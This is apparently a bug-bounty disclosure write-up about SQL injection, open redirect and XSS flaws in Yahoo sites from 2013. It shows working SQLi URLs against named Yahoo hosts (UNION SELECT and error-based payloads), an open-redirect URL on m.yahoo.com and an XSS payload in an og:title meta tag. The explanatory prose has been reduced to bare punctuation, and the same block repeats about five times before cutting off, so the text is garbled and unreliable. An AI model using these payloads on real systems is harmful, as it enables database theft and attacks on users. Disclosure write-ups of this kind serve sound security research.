basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
